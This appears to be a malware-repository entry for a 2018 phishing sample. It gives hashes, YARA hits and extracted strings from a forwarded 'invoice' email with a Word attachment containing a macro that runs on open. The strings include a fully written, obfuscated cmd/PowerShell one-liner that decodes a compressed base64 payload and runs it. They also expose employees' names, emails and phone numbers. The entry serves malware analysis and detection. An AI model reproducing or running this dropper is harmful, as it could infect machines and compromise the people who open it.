Sample details: 7111dd17f0b4b979e28b92054f802875 --

Hashes
MD5: 7111dd17f0b4b979e28b92054f802875
SHA1: bc6b0a4f5844c72816675419c41de91fb6a13408
SHA256: 336a641689a9158d78ac61adc2b19b28cb468889bc4f726eaecd47c7e23756fc
SSDEEP: 768:+8mCbpMLwVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9/isfNMM3rHKS/8Fc:CCbS0ocn1kp59gxBK85fBt+a9dX2
Details
File Type: Composite
Added: 2018-11-12 00:51:28
Yara Hits
YRP/without_images | YRP/without_attachments | YRP/with_urls | YRP/powershell | YRP/office_document_vba | YRP/Contains_VBA_macro_code | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Misc_Suspicious_Strings | YRP/Big_Numbers0 | YRP/Big_Numbers1 | FlorianRoth/PowerShell_Case_Anomaly |
Strings
		Saket Vijay Bhagat Invoice # OUI314523-940
spam_report
00000001
outlook.hmm21.com/o=Hyundai Group/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=user2c11fc2a
jihye.lee@hyundaimovex.com
Warm Regards
Sunil Kumar Singh
Dy Manager  , I&T  Mumbai
Hyundai Merchant Marine India Pvt. Ltd
Tel   :+91-22-6284 1170
Mobile : +91-9833897839
E-mail.   idsks@hmm21.com
-----Original Message-----
From: Saket Vijay Bhagat
Sent: Wednesday, November 7, 2018 9:27 PM
To: Sanjay Patel
Subject: Saket Vijay Bhagat Invoice # OUI314523-940
Please view the attached invoice.
I look foward to hearing from you.
Saket Vijay Bhagat
Phone (Business):
872 118-9259
Phone (FAX):
872 118-9057
e-Mail:insvb@hmm21.com
________________________________
* The information contained in this e-mail (including attachments) is confidential and is meant solely for the intended recipient. If you are not the intended recipient of this message please notify the sender and delete this email and any attachments from your system. HMM employs comprehensive anti-virus software, but is not responsible for viruses or other malware associated with any email sent from the Company
s systems. HMM recommends that recipients scan all file attachments. Note that any views or opinions reflected in this email are solely those of the author and do not necessarily represent those of the Company. In the event of any technical difficulty with this email and any attachments, please contact the sender or groupware@hmm21.com.
en-US, ko-KR
II=0101D476B2C0C6B655C2893019419F71B8288D20949DA5473AB120;SBMID=1;SBT=1;THA=2875388813;FIXUP=7.2984;Version=Version 14.3 (Build 158.0), Stage=H7
S-KR-ECS-02.hyundai.group
Internal
IPM.Note
sip:idsks@hmm21.com
idsks@hmm21.com
idsks@hmm21.com
idsks@hmm21.com
SUNIL KUMAR SINGH(HMM3560173)
SUNIL KUMAR SINGH(HMM3560173)
/o=Hyundai Group/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=Sunil Kumar Singh(hmm3560173)
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SINGH(HMM3560173)
Sunil Kumar Singh
<12156838835443817086.9E65D39A32CEC059@hmm21.com>
<12156838835443817086.9E65D39A32CEC059@hmm21.com>
<E32127775220D341BB4EFC9A625518100186D84675@S-KR-EMB-06>
pg1252
  BM_B
Pvt. Lt
1-22-628 4 117!
p.0 .R983P38970
@hmm21.
 Vhija) B
&`tk'&	
18 9:T27,
M-vo8"n
# OUI3145
`FM7H>
:as):B
1&LeFA
XM_9057B
0- IfI
@]O^S 
_r	psp
a#E!jpLpc
	phaoCy[
ult) nSdoe{)
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SINGH(HMM3560173)
EX:/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SINGH(HMM3560173)
Sunil Kumar Singh
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SINGH(HMM3560173)
<E32127775220D341BB4EFC9A625518100186D84675@S-KR-EMB-06>
Received: from S-KR-EMB-06.hyundai.group ([10.21.250.116]) by
 S-KR-ECS-02.hyundai.group ([203.242.43.8]) with mapi id 14.03.0158.001; Fri,
 9 Nov 2018 19:07:43 +0900
Content-Type: application/ms-tnef; name="winmail.dat"
Content-Transfer-Encoding: binary
From: Sunil Kumar Singh <idsks@hmm21.com>
To: spam_report <spam@hyundaimovex.com>
Subject: FW: Saket Vijay Bhagat Invoice # OUI314523-940
Thread-Topic: Saket Vijay Bhagat Invoice # OUI314523-940
Thread-Index: AQHUdrLAxrZVwokwGUGfcbgojSCUnaVHOrEg
Date: Fri, 9 Nov 2018 19:07:42 +0900
Message-ID: <E32127775220D341BB4EFC9A625518100186D84675@S-KR-EMB-06>
References: <12156838835443817086.9E65D39A32CEC059@hmm21.com>
In-Reply-To: <12156838835443817086.9E65D39A32CEC059@hmm21.com>
Accept-Language: en-US, ko-KR
Content-Language: en-US
X-MS-Has-Attach: yes
X-MS-Exchange-Organization-SCL: -1
X-MS-TNEF-Correlator: <E32127775220D341BB4EFC9A625518100186D84675@S-KR-EMB-06>
MIME-Version: 1.0
X-MS-Exchange-Organization-AuthSource: S-KR-ECS-02.hyundai.group
X-MS-Exchange-Organization-AuthAs: Internal
X-MS-Exchange-Organization-AuthMechanism: 04
X-Originating-IP: [172.23.15.170]
X-Auto-Response-Suppress: DR, OOF, AutoReply
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=USER2C11FC2A
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=USER2C11FC2A
Saket Vijay Bhagat Invoice # OUI314523-940
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SINGH(HMM3560173)
EX:/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=USER2C11FC2A
EX:/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=USER2C11FC2A
/Lee jihye
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=USER2C11FC2A
Sunil Kumar Singh
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SIN
GH(HMM3560173)
/Lee jihye
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=USER2C11FC2A
EX:/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SINGH(HMM3560173)
FW: Saket Vijay Bhagat Invoice # OUI314523-940
IPM.Note
2F3A5C27C0C41E4DB3D5E3ECB02D22F7@hyundai.group
application/msword
OUI314523-940.doc
OUI314~1.doc
OUI314523-940.doc
CMD C:\wINdows\systEM32\cMd   /c  "SEt   KQI= (nEW-oBJecT  SySTem.Io.StReaMReaDEr( ( nEW-oBJecT io.cOMPReSsion.DeFLAtEStReAm([iO.MEmORYstrEAm] [SyStEm.CONVeRT]::fROMBASe64STRing( 'PZBba8JAEIX/Sh4W1mDdVLBaXAK2FS8t2IpILfQlyY5mc9lJ48TYhvz3JlL7Ouc7H5xh0WbqGih76EcQkLUCEu/gPyUaDEk22ymXh0TZ2HF8jQRHEgEKrZyzWr3Ny9G6P/mL4yKNU98zqjCHhkmdWbZ4SdV+dwUIgtBgiahaRQzOcA63D/Hzqb++IgbwkGORCY3OcAuLox++/td1dswx9Iy+2DH5+hgNBlxsskRTh0+4Ldl2rS3X4vd3Ay4ZPZYuA3MaE6RZl3/ybpt3uYAzcLnHHLwg7LDoZ2VpY7VT7Yry74o1LxFTLE2CnprpBC7MjdUKbbk0J4yht2ykl4v0G08s68CjIKzq+hc=' ), [syStEM.iO.ComPReSsION.cOMPRESsIonMODe]::DeCoMPreSs) ) ,[TeXt.enCOdINg]::AsCII) ).REAdtOEnD( ) ^|^&( ([strIng]$verBOsEpreFeRence)[1,3]+'X'-JoiN'')&&   PoWErshELL      ^& ( \"{0}{1}\" -f'SET-ItE','m' )  ('Va'  +'RI'+ 'AbLE:jW1V') (    [tYpE](\"{1}{0}{2}\" -f'nVi','E','rONMENT')   )   ;    ^&(  ${En`V:`comS`PeC}[4,24,25]-join'' )(  (  (    . ( \"{1}{0}{2}{3}\" -f'-ch','gEt','IlDiT','EM'  )  (  'vA' + 'rI'+'aBle:jW1v' )  ).VALue::(  \"{3}{0}{1}{4}{6}{5}{2}\" -f 'Vir','On','BlE','gEten','Me','vaRIa','NT'  ).Invoke(  'kqi',( \"{0}{2}{1}\" -f 'pro','sS','CE' )  ) )  )"
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
PKW}Rn
LzS.![
9.O@=s
\aQBQqo{4
9B7yhT
#+PzQE
{_69bw2
ZTjAN<
iVm:_1Vh
<7^+UPn
D`Ncl)=
u|\^,2
t]kZV`
D[f$[O
bO*p8<S
]u/h>&
us,z|~M
H!g>\.
Zg.Dj6
sA$nCCt
MFM]Y5
V_=v>`y
~enW.n
T'B5jA
 Xl@+,@
p0+Z<CJ
Z3I95g
;\m`=H<
RDl@*W
`XyL203
]b-NX%
P1eV_Q\
@&g$aB#
[{t_qn
\g+;kUB
_[_YEs
=79+G<
sY7m/u
?}ZWM%e
tW$x3+Q
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
$4vq^W
MB[F7x"
>Yr]H+
a!e9#i
An7jah
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
[Content_Types].xml
dlyLho
_rels/.rels
drs/e2oDoc.xml
zfd96&
WzmDH}
cYG-/]=
drs/downrev.xmlL
@/8lR#
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
Normal.dotm
Microsoft Office Word
Sophie-PC
Attribut
e VB_Nam
e = "vrM
FYIKGf"
ormal.Th
isDocume
VGlobaBl
Cre atabl
Pr@edecla
plateDer
$Custo
  Sub 
n Error 
kRAGZ + 
@mELbqL
t QJsRj
mber UPR
 - cMwKN
PjaVrm
@jhNmwF
q tRvUV
`YiCcl
otiUF 
* (PuLTfA
W oqSCs
YhpCIPN@?
alue htu
cVZFBO /
 (jUwVs
@CJzWUK
<z wsmSI@	Tt
BcTIuj
fYjSi)
Const SM
kQNQChwj
5370957
ell@ Sha
pes(bqtr
BLdIhjr
maV KG).T
RangeB
iJCzhUL
lCYncj
hTBEapT@
 jpNmu
#jSUdQBq
T jSDRjAlhT
pmjIYK
FXSGASK`
 TiZpo
1 kVQUk
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
vrMFYIKGfbR
Document_open
FormatDateTimeG
WkRAGZZ
hiIMwA;
YrhoOiN
cvKSzE
mELbqLl4
tQJsRj
FormatNumber/
UPRwWao
cMwKNLW
PjaVrm
jhNmwF
qtRvUVU)
tKVUc+
YiCclY0C
otiUFp
WoqSCs
YhCIPN
TimeValue
htuaKk}<
mSfPtA
cVZFBO
jUwVsr
CJzWUK
zwsmSI
TtFcAJ
LHosMd
FAvqK7b
BcTIujmj
SMkQNQChwj
ShellV
Shapes
BLdIhjrw:
IjzqazhQ
TextFrame
TextRange
iJCzhULb
lCYncjX
TBEapTw
aMoPSS
OkRKrw
jSUdQq
pZMiiM
SjEmTI
jSDRjs.
pjiKj&
VwXhzu
oCBSSw
SVLWWu
pmjIYK
SGASKV
TiZpob
NqHia0
Mjkujb
kVQUkW
XNthOs
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\system3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2DF
8D04C-5B
FA-101B-
m Files\@Common
icrosoft
 Shared\
OFFICE16
\MSO.DLL
M 16.0
9vrMFYIK GfG
*\CNormalrU
ThisDocument
Project
vrMFYIKGf
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB
C:\Windows\system32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
Document
Document_open
vrMFYIKGf
ID="{3EBC5840-0B52-4169-89D9-94B386BE262E}"
Document=vrMFYIKGf/P
&H00000000
ExeName32="FQzpzbZWJ"
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="1311D8B545B945B945B945B9"
DPB="7C7EB72049884A884A88"
GC="E5E72EDBFE45FF45FFBA"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
vrMFYIKGf=0, 0, 0, 0, C
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Normal.dotm
Microsoft Office Word
Sophie-PC
/o=Hyundai Group/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=spam_report[mal.spam]cac
spam_report
spam@hyundaimovex.com
EX:/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SPAM_REPORT[MAL.SPAM]CAC
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=Spam_report[mal.spam]cac
spam_report
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=Spam_report[mal.spam]cac